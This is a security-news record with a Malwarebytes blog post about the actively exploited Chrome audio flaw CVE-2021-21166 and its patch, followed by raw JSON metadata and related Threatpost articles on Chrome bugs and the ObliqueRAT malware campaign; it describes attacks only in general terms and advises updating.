ID MALWAREBYTES:07CCE98B638067D2F0F9AD53E87E8D55 Type malwarebytes Reporter Pieter Arntz Modified 2021-03-04T13:24:38
Description
The Microsoft Browser Vulnerability Research team has found and reported a vulnerability in the audio component of Google Chrome. Google has fixed this high-severity vulnerability (CVE-2021-21166) in its Chrome browser and is warning Chrome users that an exploit exists in the wild for the vulnerability. It is not the first time that Chrome's audio component was targeted by an exploit.
No details available
Further details about the vulnerability are restricted until a majority of Chrome users have updated to the patched version of the software. What we do know is that it concerns an object lifecycle issue in the audio component of the browser.
An object lifecycle is used in object oriented programming to describe the time between an object's creation and its destruction. Outside of the lifecycle the object is no longer valid, which could lead to a vulnerability.
For example, if everything goes as planned with the lifecycle the correct amount of computer memory is allocated and reclaimed at the right times. If it doesn't go well, and memory is mismanaged, that could lead to a flaw – or vulnerability - in the program.
More vulnerabilities patched in the update
As per usual Google patched several other vulnerabilities and bugs in the same update. Some of the other vulnerabilities were listed with high severity:
Google said that it fixed three heap-buffer overflow flaws in the TabStrip (CVE-2021-21159, CVE-2021-21161) and WebAudio (CVE-2021-21160) components. A high-severity use-after-free error (CVE-2021-21162) was found in WebRTC. Two other high-severity flaws include an insufficient data validation issue in Reader Mode (CVE-2021-21163) and an insufficient data validation issue in Chrome for iOS (CVE-2021-21164).
The CVE’s
Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).
CVE-2021-21159, CVE-2021-21161: Heap buffer overflow in TabStrip. Heap is the name for a region of a process’ memory which is used to store dynamic variables. A buffer overflow is a type of software vulnerability that exists when an area of memory within a software application reaches its address boundary and writes into an adjacent memory region. In software exploit code, two common areas that are targeted for overflows are the stack and the heap.
CVE-2021-21160: Heap buffer overflow in WebAudio.
CVE-2021-21162: Use after free in WebRTC. Use after free (UAF) is a vulnerability due to incorrect use of dynamic memory during a program’s operation. If after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program. WebRTC allows programmers to add real-time communication capabilities to their application.
CVE-2021-21163: Insufficient data validation in Reader Mode. Insufficient data validation could allow an attacker to use especially crafted input to manipulate a program.
CVE-2021-21164: Insufficient data validation in Chrome for iOS.
When more details about the vulnerabilities come to light it's possible that more exploits for them will be found in the wild. It depends a lot on how easy they are to abuse, and how big the possible impact can be. But with one already being used in the wild, it is advisable to update now.
How to update
The easiest way to do it is to allow Chrome to update automatically, which basically uses the same method I outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong, such as an extension stopping you from updating the browser.
So, it doesn’t hurt to check now and then. And now would be a good time.
My preferred method is to have Chrome open the page chrome://settings/help which you can also find by clicking Settings > About Chrome.
If there is an update available, Chrome will notify you and start downloading it. Then it will tell you all you have to do to complete the update is Relaunch the browser.
After the update your version should be at 89.0.4.4389.72 or later
{"id": "MALWAREBYTES:07CCE98B638067D2F0F9AD53E87E8D55", "type": "malwarebytes", "bulletinFamily": "blog", "title": "Update now! Chrome fix patches in-the-wild zero-day", "description": "The Microsoft Browser Vulnerability Research team has found and reported a vulnerability in the audio component of Google Chrome. Google has fixed this high-severity vulnerability ([CVE-2021-21166](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21166>)) in its Chrome browser and is warning Chrome users that an exploit exists in the wild for the vulnerability. It is [not the first time](<https://www.tenable.com/blog/cve-2019-13720-use-after-free-zero-day-in-google-chrome-exploited-in-the-wild>) that Chrome's audio component was targeted by an exploit.\n\n### No details available\n\nFurther details about the vulnerability are restricted until a majority of Chrome users have updated to the patched version of the software. What we do know is that it concerns an object lifecycle issue in the audio component of the browser.\n\nAn object lifecycle is used in object oriented programming to describe the time between an object's creation and its destruction. Outside of the lifecycle the object is no longer valid, which could lead to a vulnerability.\n\nFor example, if everything goes as planned with the lifecycle the correct amount of computer memory is allocated and reclaimed at the right times. If it doesn't go well, and memory is mismanaged, that could lead to a flaw \u2013 or vulnerability - in the program.\n\n### More vulnerabilities patched in the update\n\nAs per usual Google patched several other vulnerabilities and bugs in the same update. Some of the other vulnerabilities were listed with high severity:\n\nGoogle said that it fixed three heap-buffer overflow flaws in the TabStrip ([CVE-2021-21159](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21159>), [CVE-2021-21161](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21161>)) and WebAudio ([CVE-2021-21160](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21160>)) components. A high-severity use-after-free error ([CVE-2021-21162](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21162>)) was found in WebRTC. Two other high-severity flaws include an insufficient data validation issue in Reader Mode ([CVE-2021-21163](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21163>)) and an insufficient data validation issue in Chrome for iOS ([CVE-2021-21164](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-21164>)).\n\n### The CVE\u2019s\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).\n\n * CVE-2021-21159, CVE-2021-21161: Heap buffer overflow in TabStrip. Heap is the name for a region of a process\u2019 memory which is used to store dynamic variables. A buffer overflow is a type of software vulnerability that exists when an area of memory within a software application reaches its address boundary and writes into an adjacent memory region. In software exploit code, two common areas that are targeted for overflows are the stack and the heap.\n * CVE-2021-21160: Heap buffer overflow in WebAudio.\n * CVE-2021-21162: Use after free in WebRTC. Use after free (UAF) is a vulnerability due to incorrect use of dynamic memory during a program\u2019s operation. If after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program. WebRTC allows programmers to add real-time communication capabilities to their application.\n * CVE-2021-21163: Insufficient data validation in Reader Mode. Insufficient data validation could allow an attacker to use especially crafted input to manipulate a program.\n * CVE-2021-21164: Insufficient data validation in Chrome for iOS.\n\nWhen more details about the vulnerabilities come to light it's possible that more exploits for them will be found in the wild. It depends a lot on how easy they are to abuse, and how big the possible impact can be. But with one already being used in the wild, it is advisable to update now. \n\n### How to update\n\nThe easiest way to do it is to allow Chrome to update automatically, which basically uses the same method I outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong, such as an extension stopping you from updating the browser.\n\nSo, it doesn\u2019t hurt to check now and then. And now would be a good time.\n\nMy preferred method is to have Chrome open the page **chrome://settings/help** which you can also find by clicking **Settings > About Chrome**.\n\nIf there is an update available, Chrome will notify you and start downloading it. Then it will tell you all you have to do to complete the update is **Relaunch** the browser.\n\n_After the update your version should be at 89.0.4.4389.72 or later_\n\nStay safe, everyone!\n\nThe post [Update now! Chrome fix patches in-the-wild zero-day](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/update-now-chrome-fix-patches-in-the-wild-zero-day/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "published": "2021-03-04T13:24:38", "modified": "2021-03-04T13:24:38", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/update-now-chrome-fix-patches-in-the-wild-zero-day/", "reporter": "Pieter Arntz", "references": [], "cvelist": ["CVE-2019-13720", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21166"], "lastseen": "2021-03-04T14:27:39", "viewCount": 199, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:C5336A4C-EEE0-4EA3-AD28-85F0EF3F0F75", "AKB:DFA61FBF-688B-44E9-8B09-134E93207AD9", "AKB:3609E46B-E023-474D-B14A-026E01AF8EA9", "AKB:C300BC5A-FE8F-4274-AFA8-C1F47411FEC1"]}, {"type": "threatpost", "idList": ["THREATPOST:CF9E25BD324C5940B0795721CA134155", "THREATPOST:74F8E9B3D3CB64CAF2AF0B54DE29C9A6", "THREATPOST:6F7E512F15913694CF17A906715FE678", "THREATPOST:230DF95E70EB9C4F372C198798822D19", "THREATPOST:A8D4979B3A84B8E7B98B5321FA948454", "THREATPOST:DF87733B74489628AB9F2C89704380A9"]}, {"type": "cve", "idList": ["CVE-2019-13720", "CVE-2021-21163", "CVE-2021-21159", "CVE-2021-21164", "CVE-2021-21160", "CVE-2021-21162", "CVE-2021-21161", "CVE-2021-21166"]}, {"type": "mscve", "idList": ["MS:CVE-2021-21161", "MS:CVE-2021-21164", "MS:CVE-2021-21159", "MS:CVE-2021-21162", "MS:CVE-2021-21160", "MS:CVE-2021-21163", "MS:CVE-2021-21166"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/FREEBSD-CVE-2021-21159/"]}, {"type": "securelist", "idList": ["SECURELIST:B3F6FE1E8EA0830B8B1306E79A2E63EA", "SECURELIST:4F6413DE862444B5FA0B192AF22A042D", "SECURELIST:E2805DD2729049C4BBE6F641B5ADA21C", "SECURELIST:FED90A1B8959D4636DBADB1E135F7BF7", "SECURELIST:5CA08A4E968A3A57A891B8DC568EBF97"]}, {"type": "nessus", "idList": ["OPENSUSE-2019-2664.NASL", "DEBIAN_DSA-4886.NASL", "OPENSUSE-2021-392.NASL", "MACOSX_GOOGLE_CHROME_89_0_4389_72.NASL", "FREEBSD_PKG_F00B65D87CCB11EBB3BEE09467587C17.NASL", "GOOGLE_CHROME_89_0_4389_72.NASL", "GENTOO_GLSA-202004-04.NASL", "MACOSX_GOOGLE_CHROME_78_0_3904_87.NASL", "MICROSOFT_EDGE_CHROMIUM_89_0_774_45.NASL", "FEDORA_2021-C88A96BD4B.NASL"]}, {"type": "fedora", "idList": ["FEDORA:3608E6051CC4", "FEDORA:2B88A6092506", "FEDORA:BF4FC30A0346", "FEDORA:A017F3074280", "FEDORA:AC09F608BFF0", "FEDORA:C67773052A4D"]}, {"type": "freebsd", "idList": ["F00B65D8-7CCB-11EB-B3BE-E09467587C17"]}, {"type": "thn", "idList": ["THN:9C73175440CD28F1BCB5707C48282690", "THN:EF50BA60FF5E3EF9AF1570FF5A2589A0", "THN:F197A729A4F49F957F9D5910875EBAAA", "THN:15BF409706D7240A5276C705732D745F"]}, {"type": "archlinux", "idList": ["ASA-201911-7", "ASA-201911-1", "ASA-201911-2", "ASA-202103-19"]}, {"type": "cisa", "idList": ["CISA:809811C28F231C547A37018C8189C268"]}, {"type": "talosblog", "idList": ["TALOSBLOG:1789DE47001AAA9B14B2D2EC65C18C6A"]}, {"type": "gentoo", "idList": ["GLSA-202004-04"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4886-1:0EF07", "DEBIAN:DSA-4562-1:58850"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2426-1", "OPENSUSE-SU-2019:2447-1", "OPENSUSE-SU-2019:2421-1", "OPENSUSE-SU-2019:2427-1", "OPENSUSE-SU-2019:2664-1"]}, {"type": "redhat", "idList": ["RHSA-2019:3775"]}, {"type": "kaspersky", "idList": ["KLA11601", "KLA11716"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310877259", "OPENVAS:1361412562310815823", "OPENVAS:1361412562310815825", "OPENVAS:1361412562310852760", "OPENVAS:1361412562310704562", "OPENVAS:1361412562310877015", "OPENVAS:1361412562310877007", "OPENVAS:1361412562310815824"]}, {"type": "krebs", "idList": ["KREBS:F5ECCD2DD57FDBC0A6062FA0AB5371FB"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:4C8E7D595A367E9DA6260DA13FAF3886", "GOOGLEPROJECTZERO:C2A64C2133DFD2ACB457C2DD2790CBF7", "GOOGLEPROJECTZERO:2E85097DC4FBE492B1CB6FAE84AFE126"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-03-04T14:27:39", "rev": 2}, "score": {"value": 5.5, "vector": "NONE", "modified": "2021-03-04T14:27:39", "rev": 2}, "vulnersScore": 5.5}, "immutableFields": []}
{"threatpost": [{"lastseen": "2021-03-04T21:58:01", "bulletinFamily": "info", "cvelist": ["CVE-2020-15995", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166"], "description": "Google has fixed a high-severity vulnerability in its Chrome browser and is warning Chrome users that an exploit exists in the wild for the flaw.\n\nThe vulnerability is one of 47 security fixes that the tech giant rolled out on Tuesday in Chrome 89.0.4389.72, including patches for eight high-severity flaws.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe Chrome team is delighted to announce the promotion of Chrome 89 to the stable channel for Windows, Mac and Linux,\u201d according to Google [on Tuesday](<https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html>). \u201cThis will roll out over the coming days/weeks.\u201d\n\n## Google Chrome: Actively-Exploited Security Flaw\n\nThe actively-exploited vulnerability in question (CVE-2021-21166) stems from the audio component of the browser (which [has previously been found](<https://threatpost.com/google-discloses-chrome-flaw-exploited-in-the-wild/149784/>) to have various security issues in the past). According to Google, the flaw stems from an object lifecycle issue. The object lifecycle is the duration in which a programming language object is valid for use \u2013 between the time it is created and destroyed.\n\nBeyond Google noting that it \u201cis aware of reports that an exploit for CVE-2021-21166 exists in the wild,\u201d further information about the glitch is unavailable. That\u2019s because \u201caccess to bug details and links may be kept restricted until a majority of users are updated with a fix,\u201d according to Google.\n\nThe flaw was reported by Alison Huffman, with the Microsoft Browser Vulnerability Research team, on Feb. 11. Huffman reported another high-severity flaw that Google fixed in Chrome, which also stemmed from an object lifecycle issue in the audio component (CVE-2021-21165).\n\n## Other Chrome Security High-Severity Flaws\n\nDetails around the other high-severity vulnerabilities patched by Google in Chrome remain scant. However, Google said that it fixed three heap-buffer overflow flaws in the TabStrip (CVE-2021-21159, CVE-2021-21161) and WebAudio (CVE-2021-21160) components. A high-severity use-after-free error (CVE-2021-21162) was found in WebRTC.\n\nTwo other high-severity flaws include an insufficient data validation issue in Reader Mode (CVE-2021-21163) and an insufficient data validation issue in Chrome for iOS (CVE-2021-21164).\n\n## **Google Chrome Security Updates**\n\nChrome will in many cases update to its newest version automatically, however security experts suggest that users double check that this has happened. To check if an update is available:\n\n * Google Chrome users can go to chrome://settings/help by clicking Settings > About Chrome\n * If an update is available Chrome will notify users and then start the download process\n * Users can then relaunch the browser to complete the update\n\nThe fixes come after Google in February [warned of a zero-day vulnerability](<https://threatpost.com/google-chrome-zero-day-windows-mac/163688/>) in its V8 open-source web engine that\u2019s being actively exploited by attackers. In January, the Cybersecurity and Infrastructure Security Agency (CISA) [urged Windows, macOS and Linux users](<https://threatpost.com/firefox-chrome-edge-bugs-system-hijacking/162873/>) of Google\u2019s Chrome browser to patch an out-of-bounds write bug (CVE-2020-15995) impacting the current 87.0.4280.141 version of the software.\n\nAnd in December, Google updated Chrome to fix four bugs with a severity rating of \u201chigh\u201d and eight overall. [Three were use-after-free flaws](<https://threatpost.com/google_chrome_bugs_patched/161907/>), which could allow an adversary to generate an error in the browser\u2019s memory, opening the door to a browser hack and host computer compromise.\n", "modified": "2021-03-03T21:17:14", "published": "2021-03-03T21:17:14", "id": "THREATPOST:A8D4979B3A84B8E7B98B5321FA948454", "href": "https://threatpost.com/google-patches-actively-exploited-flaw-in-chrome-browser/164468/", "type": "threatpost", "title": "Google Patches Actively Exploited Flaw in Chrome Browser", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-03T22:09:38", "bulletinFamily": "info", "cvelist": ["CVE-2021-21166"], "description": "The ObliqueRAT malware is now cloaking its payloads as seemingly-innocent image files that are hidden on compromised websites.\n\nThe remote access trojan (RAT), which has been operating since 2019, spreads via emails, which have malicious Microsoft Office documents attached. Previously, payloads were embedded into the documents themselves. Now, if users click on the attachment, they\u2019re redirected to malicious URLs where the payloads are hidden with steganography.\n\nResearchers warn that this new tactic has been seen helping ObliqueRAT operators to avoid detection during the malware\u2019s targeting of various organizations in South Asia \u2014 where the goal is to ultimately sends victims an email with malicious Microsoft Office documents, which, once clicked, fetch the payloads and ultimately exfiltrate various data from the victim.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis new campaign is a typical example of how adversaries react to attack disclosures and evolve their infection chains to evade detections,\u201d said Asheer Malhotra, researcher with Cisco Talos, [on Tuesday](<https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html>). \u201cModifications in the ObliqueRAT payloads also highlight the usage of obfuscation techniques that can be used to evade traditional signature-based detection mechanisms.\u201d\n\n## **What is the ObliqueRAT Malware?**\n\n[The known activity for ObliqueRAT](<https://blog.talosintelligence.com/2020/02/obliquerat-hits-victims-via-maldocs.html>) dates back to November 2019, part of a campaign targeting entities in Southeast Asia and uncovered by Cisco Talos researchers in February 2020. ObliqueRAT operators have always used emails with malicious attachments as an initial infection vector. Generally the infection chain uses an initial executable, which acts as a dropper for ObliqueRAT itself.\n\nOnce it infected systems, ObliqueRAT exfiltrates various information, including system data, a list of drives and a list of running processes.\n\n## **ObliqueRAT Malware Evolution**\n\nThe newly discovered ObliqueRAT attack chain was part of a campaign that started in May last year \u2013 but which was only recently uncovered by researchers. In addition to the use of URL redirects, the payloads themselves have also been given an update, now consisting of seemingly benign bitmap image files (BMP).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/03/02102115/ObliqueRAT-Payloads.png>)\n\nThe new attack chain used by ObliqueRAT. Credit: Cisco Talos\n\nThe image files contain both legitimate image data and malicious executable bytes concealed in the image data, said researchers. Threatpost has reached out to Cisco Talos for further information on the compromised websites and the images used as part of the attack.\n\nThis is a well-known tactic used by [threat actors, called steganography](<https://threatpost.com/steganography-pinpoint-attacks-industrial-targets/156151/>). Attackers hide malware in image files as a way to circumvent detection. That\u2019s because many filters and gateways [let image file formats pass without too much scrutiny](<https://threatpost.com/rare-steganography-hack-can-compromise-fully-patched-websites/146701/>).\n\nThe initial email sent to victims contains malicious documents with new macros, which redirect users to the malicious URLs containing these payloads. The malicious macros consequently download the BMP files, and the ObliqueRAT payload is extracted to the disk.\n\nThere are slight variations that have been seen in real-world attacks. One instance of a malicious document that researchers found \u201cuses a similar technique, with the difference being that the payload hosted on the compromised website is a BMP image containing a .ZIP file that contains ObliqueRAT payload,\u201d said Malhotra. \u201cThe malicious macros are responsible for extracting the .ZIP and subsequently the ObliqueRAT payload on the endpoint.\u201d\n\nDuring the course of their investigation, researchers also discovered three previously used but never-before-seen payloads for ObliqueRAT, which showed how the malware authors have made changes over time. For instance, one of the versions created in September added new file enumeration and stealing capabilities, as well as expanded the payload\u2019s functionalities to include the ability to take webcam and desktop screenshots and recordings.\n\n## **ObliqueRAT: Hiding From Detection, Improved Persistence**\n\nThis updated payload delivery technique gives attackers a leg up in sidestepping detection, said researchers.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/03/02102156/ObliqueRAT-Payloads-2.png>)\n\nThe evolution of ObliqueRAT\u2019s payloads. Credit: Cisco Talos\n\n\u201cIt is highly likely that these changes are in response to previous disclosures to achieve evasion for these new campaigns,\u201d they said. \u201cThe usage of compromised websites is another attempt at detection evasion.\u201d\n\nThe macros also have adopted a new tactic for achieving reboot persistence for the ObliqueRAT payloads. This is accomplished by creating a shortcut (.URL file extension) in the infected user\u2019s Startup directory, said researchers. Once the computer reboots, the payloads will then still be able to run.\n\n## **RevengeRAT: Researchers Link With \u2018Low Confidence\u2019**\n\nResearchers said that they observed overlaps in the command-and-control (C2) server infrastructure between ObliqueRAT and a RevengeRAT campaign. However, they only made the connection with \u201clow confidence\u201d due to lack of any other more substantial evidence.\n\nRevengeRAT is a [commodity malware family](<https://threatpost.com/malware-dropper-dual-rats/150271/>) that [has been used](<https://threatpost.com/iranian-apt33-shakes-up-cyberespionage-tactics/146041/>) by Iran-linked, espionage-focused [threat group APT33](<https://threatpost.com/apt33-mounts-targeted-botnet-attacks-us/150248/>) in the past. The RAT collects and exfiltrates information from the victim\u2019s system.\n\nPreviously, researchers also made links between ObliqueRAT and Crimson RAT. The functionalities of Crimson RAT [include stealing credentials](<https://threatpost.com/apt36-taps-coronavirus-as-golden-opportunity-to-spread-crimson-rat/153776/>) from victims\u2019 browsers, capturing screenshots, collecting antivirus software information, and listing the running processes, drives and directories from victim machines. Researchers said that the two RATs shared \u201csimilar maldocs and macros\u201d in previous ObliqueRAT campaigns.\n\n\u201cThis malware has links to the Transparent Tribe group that has historically targeted entities in South Asia,\u201d Malhotra told Threatpost. \u201cAs is the case with most suspected APT campaigns, this campaign is also low volume. A low-volume campaign has better chances of remaining undiscovered for longer periods of time thus increasing the chances of success for the attackers.\u201d\n", "modified": "2021-03-02T17:06:51", "published": "2021-03-02T17:06:51", "id": "THREATPOST:CF9E25BD324C5940B0795721CA134155", "href": "https://threatpost.com/website-images-obliquerat-malware/164395/", "type": "threatpost", "title": "Compromised Website Images Camouflage ObliqueRAT Malware", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-04-24T20:49:12", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720", "CVE-2019-1458"], "description": "As the COVID-19 pandemic continues to force in-person cybersecurity event cancellations, Kaspersky is forging ahead with a virtual security summit, SAS@home.\n\nTopics on [the agenda](<https://thesascon.com/SAS@home>) include threat intel on advanced persistent threats (APTs), new vulnerability research, and topics related to a post-crisis world \u2013 such as how the industry is changing because of the pandemic.\n\nThe online conference, scheduled for April 28-30, is meant to complement the firm\u2019s annual Security Analyst Summit (SAS). The in-person SAS event was originally scheduled for April in Barcelona, and will now take place in November \u2013 with SAS@home providing an opportunity for community to come together and share insights and research in the meantime.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nExperts from across the IT security industry will present three days of knowledge sharing, [pecha-kucha moments](<https://www.pechakucha.com/>), \u201cfireside chats\u201d and Master Class training sessions. The sessions will be presented live, free to all participants via the ON24 webinar platform, with on-demand replays available after the fact. The event will run each day from 11 a.m. to 1 p.m. ET.\n\n\u201c[Attendees] will enjoy a unique opportunity to chat online and learn from some of the world\u2019s leading cybersecurity researchers and influencers in a welcoming atmosphere, while also taking a deep dive into a top-notch program of topical presentations typical for the regular SAS,\u201d Kaspersky said in a media statement.\n\nPresentations will cover new, unpublished research as well as the latest evolutions of known trends. For instance, \u201cHiding in Plain Sight: An APT Comes into a Market\u201d on Tuesday will feature Kaspersky researchers Alexey Firsh and Lev Pikman opening the kimono on previously undisclosed threat intelligence regarding a nation-state cybercriminal group.\n\nMeanwhile, \u201cZero-day Exploits of Operation WizardOpium,\u201d also on Tuesday, will feature Kaspersky researchers Anton Ivanov and Boris Larin offering a deep dive and new information regarding the weapons arsenal of a sophisticated threat group. The group shares characteristics with known APTs like DarkHotel and Lazarus Group \u2013 but have evaded any serious attribution attempts. WizardOpium attacks [were seen in November](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) using a zero-day for Google\u2019s Chrome browser (CVE-2019-13720) and [in December](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>) exploiting yet another to gain elevation-of-privilege (CVE-2019-1458) on targets as well as to escape the Chrome process sandbox.\n\nAlso of note in the agenda are presentations from third-party researchers, including Joe FitzPatrick, researcher with Securing Hardware; Ryan Naraine, director of security strategy at Intel; Sounil Yu, CISO in residence at YL Ventures; and Alex Frappier, director of strategic partnerships with the CanCyber Foundation. Other third-party speakers are to be announced.\n\nFitzPatrick, who [spoke at last year\u2019s SAS event](<https://threatpost.com/sas-2019-joe-fitzpatrick-warns-of-the-5-supply-chain-attack/143684/>) in Singapore, will use his session on Tuesday, \u201cHardware Hacking Under Quarantine,\u201d to show off almost a dozen unique avenues where an attacker might access PCI express interfaces in a computer\u2019s hardware in order to mount a [direct memory access (DMA) attack](<https://threatpost.com/rambleed-side-channel-privileged-memory/145629/>) on the target system.\n\n\u201cUp to this point the majority of the research has been done against laptop, desktop and server systems through full-size PCI express ports or Thunderbolt ports,\u201d FitzPatrick told Threatpost. \u201cI quickly show a bunch of places, including on smaller embedded devices, where this can also be done.\u201d\n\nFitzPatrick\u2019s session will be in a pecha-kucha 20\u00d720 presentation format, where the speaker shows 20 images, each for 20 seconds, to tell a 400-second story with visuals guiding the way. Another pecha-kucha presentation will come from Kaspersky\u2019s David Jacoby, who [also spoke at last year\u2019s event](<https://threatpost.com/social-engineering-telcos-phone-hijacking/144495/>). For SAS@home, he\u2019ll be presenting on \u201cHow Does COVID-19 Affect the Internet?\u201d on Wednesday.\n\nCanCyber\u2019s Frappier meanwhile will be giving a deep-dive training Master Class on Thursday on the importance of body language. Specifically, he\u2019ll be discussing how red teams can use an understanding of nonverbal cues as a way to increase their chances of success while making impersonation or [\u201cvishing\u201d attacks](<https://threatpost.com/romanian-hackers-extradited-to-u-s-over-18m-vishing-scam/131763/>).\n\nFrappier told Threatpost that the subject is important in the context of today\u2019s threat landscape given that falling for social-engineering attacks is an enduring issue, and at the same time, video has become an important communication avenue in today\u2019s challenging times.\n\n\u201cWe have a difficult time reading people, and our adversaries are aware of this,\u201d he told Threatpost. \u201cYet, this is a two-way street. Better reading and understanding of the nonverbal will make us better at detecting important threats. Better encoding for our nonverbal message will allow us to become better communicators. We will get our message across and will get buy-in from managers and commercial partners.\u201d\n\nAs for the other planned sessions, Intel\u2019s Naraine will offer a Tuesday fireside chat on what cybersecurity could look like in a post-crisis world, on the other side of the pandemic. Kaspersky\u2019s Costin Raiu meanwhile will offer another Master Class (topic to be determined) on Wednesday; and on Thursday, Igor Kuznetsov of Kaspersky will present a session on \u201cStatic Binary Analysis: The Essentials.\u201d\n\nThe agenda will also feature a few surprise guests, according to conference organizers.\n\nYou can keep up with the event via Threatpost, which will be providing daily reports on the virtual conference.\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "modified": "2020-04-24T20:44:05", "published": "2020-04-24T20:44:05", "id": "THREATPOST:230DF95E70EB9C4F372C198798822D19", "href": "https://threatpost.com/sashome-virtual-summit-showcases-threat-intel/155128/", "type": "threatpost", "title": "SAS@Home Virtual Summit Showcases New Threat Intel, Industry Changes", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-09T22:42:49", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720", "CVE-2019-13721", "CVE-2019-5869"], "description": "UPDATE\n\nGoogle is warning users of a high-severity vulnerability in its Chrome browser that is currently being exploited by attackers to hijack computers.\n\nThe flaw ([CVE-2019-13720](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-13720>)), discovered by security researchers Anton Ivanov and Alexey Kulaev at Kaspersky, exists in Google Chrome\u2019s audio component. Google is urging users to update to the latest version of Chrome, 78.0.3904.87 (for Windows, Mac, and Linux) as it rolls out over the coming days.\n\n\u201cThis [updated] version addresses vulnerabilities that an attacker could exploit to take control of an affected system,\u201d according to a Thursday Cybersecurity and Infrastructure Security Agency [(CISA) alert](<https://www.us-cert.gov/ncas/current-activity/2019/10/31/google-releases-security-updates-chrome>). \u201cOne of these vulnerabilities (CVE-2019-13720) was detected in exploits in the wild.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe bug (CVE-2019-13720) is a use-after-free flaw, which is a memory corruption flaw where an attempt is made to access memory after it has been freed. This can cause an array of malicious impacts, from causing a program to crash, to potentially leading to execution of arbitrary code \u2013 or even enable full remote code execution capabilities.\n\nCostin Raiu, director of Global Research and Analysis Team at Kaspersky, [wrote on Twitter](<https://twitter.com/craiu/status/1190260465139691522>) \u201ca few days ago our technologies caught a new Chrome 0day exploit used in the wild and we reported it to Google.\u201d\n\n> A few days ago our technologies caught a new Chrome 0day exploit used in the wild and we reported it to Google. Just released-Chrome 78 patches it, credits to my colleagues [@antonivanovm](<https://twitter.com/antonivanovm?ref_src=twsrc%5Etfw>) and Alexey Kulaev for finding the bug. <https://t.co/Bgm0QtNO2d>\n> \n> \u2014 Costin Raiu (@craiu) [November 1, 2019](<https://twitter.com/craiu/status/1190260465139691522?ref_src=twsrc%5Etfw>)\n\nKaspersky researchers are calling the exploits [Operation WizardOpium](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>). The attack leveraged a waterhole-style injection on a Korean-language news portal, they said.\n\nA malicious JavaScript code was inserted in the main page, which then loaded a profiling script from a remote site. Researchers said that the exploit \u201cused a race condition bug between two threads due to missing proper synchronization between them. It gives an attacker an a Use-After-Free condition that is very dangerous because it can lead to code execution scenarios.\u201d\n\n\u201cSo far, we have been unable to establish a definitive link with any known threat actors,\u201d they said in a Friday analysis. \u201cThere are certain very weak code similarities with Lazarus attacks, although these could very well be a false flag. The profile of the targeted website is more in line with earlier [DarkHotel](<https://securelist.com/the-darkhotel-apt/66779/>) attacks that have recently deployed similar false flag attacks.\u201d\n\nGoogle and researchers remain tight lipped intentionally. \u201cAccess to bug details and links may be kept restricted until a majority of users are updated with a fix,\u201d according to [Google\u2019s alert](<https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html>). \u201cWe will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven\u2019t yet fixed,\u201d Google said in its advisory.\n\n[Use-after-free 